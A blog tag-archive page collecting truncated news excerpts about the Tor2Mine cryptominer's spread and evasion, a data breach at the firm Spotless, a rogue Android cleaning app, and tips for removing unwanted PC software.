Tag Archive for: Cleaning

Tor2Mine cryptominer has evolved: Just patching and cleaning the system won’t help

/in


Sophos released new findings on the Tor2Mine cryptominer, that show how the miner evades detection, spreads automatically through a target network and is increasingly harder to remove from an infected system. Tor2Mine is a Monero-miner that has been active for at least two years.

Tor2Mine cryptominer

In the research, Sophos describes new variants of the miner that include a PowerShell script that attempts to disable malware protection, execute the miner payload and steal Windows administrator credentials. What happens next depends on whether the attackers successfully gain administrative privileges with the stolen credentials. This process is the same for all the variants analyzed.

For example, if the attackers manage to get hold of administrative credentials, they can secure the privileged access they need to install the mining files. They can also search the network for other machines that they can install the mining files on. This enables Tor2Mine to spread further and embed itself on computers across the network.

Tor2Mine cryptominer can execute the miner remotely and filelessly

If the attackers cannot gain administrative privileges, Tor2Mine can still execute the miner remotely and filelessly by using commands that are run as scheduled tasks. In this instance, the mining software is stored remotely rather than on a compromised machine.

The variants all attempt to shut down anti-malware protection and install the same miner code. Similarly, in all cases, the miner will continue to re-infect systems on the network unless it encounters malware protection or is completely eradicated from the network.

“The presence of miners, like Tor2Mine, in a network is almost always a harbinger of other, potentially more dangerous intrusions. However, Tor2Mine is much more aggressive than other miners,” said Sean Gallagher, senior threat researcher at Sophos.

“Once it has established a foothold on a network, it is difficult to root out without the assistance of endpoint protection software and other anti-malware measures. Because it spreads laterally away from the initial point of compromise, it can’t be eliminated just by patching and cleaning one system. The miner will continually attempt…

Source…

Major data breach at cleaning and catering company Spotless

/in


Trans-Tasman catering and cleaning firm Spotless has admitted to a huge data breach in which hackers may have obtained past and present staff members’ passport and IRD numbers, amongst other personal information.

Internet experts said the breach was very serious and there was enough personal information in the potential leak that meant a “very high risk” of identity theft.

Spotless told affected workers by email on Thursday.

One woman who received the email said she was deeply worried and had immediately visited her bank to change her credit cards. She was concerned her passport was compromised, and also that Spotless’ lower-waged cleaning staff, many of whom had English as a second language and perhaps poor access to email, would not necessarily receive the communication.

READ MORE:
* Fears Airpoints members’ personal information leaked in data breach
* ID theft stings, but it’s hard to pin on specific data hacks
* Marriott will pay for new passports after data breach ‘if fraud has taken place’
* Cathay Pacific hack includes passport numbers, travel histories

Netsafe chief executive Martin Cocker said the amount of data involved suggested the hackers had got into the company’s HR files. He said there was a risk of criminals using that data to apply for credit and services using people’s identities.

“There is a high risk to the subjects of the attack of future identity theft,” Cocker said. “If they have taken that much personal data, it is pretty high risk to the individual, so we would suggest people go through a process of trying to reduce that risk.”

Internet law expert Rick Shera said it definitely qualified as a privacy breach, “and given the type of information involved and the number of people involved it would be classed a serious breach, there wouldn’t be any doubt about that.”

Shera said it depended on if the data had been encrypted, or whether it had been stolen, but “that level of information is clearly information that could be used by someone to impersonate an individual”.

He said taking passport and IRD numbers was “pretty serious” and could even conceivably allow a hacker to secure a RealMe account, the internet ID used to deal…

Source…

New Android Cleaning App Pulls Dirty Tricks to Grab Admin Rights – Security Intelligence (blog)

/in

Security Intelligence (blog)

New Android Cleaning App Pulls Dirty Tricks to Grab Admin Rights
Security Intelligence (blog)
While games remain the top category across both Android and iOS, there's a growing focus on security. Users are concerned about the threat posed by third-party apps, malicious emails and mobile ransomware. So it's no surprise that a new threat known as …

and more »

android security – read more

Cleaning Unnecessary Files from Computer – Associated Content

/in

Remove these programs with computer software tools such as Revo Uninstaller . Download your desired software after deleting the unwanted programs. Delete the surplus security programs. Some pre-installed security …
Read more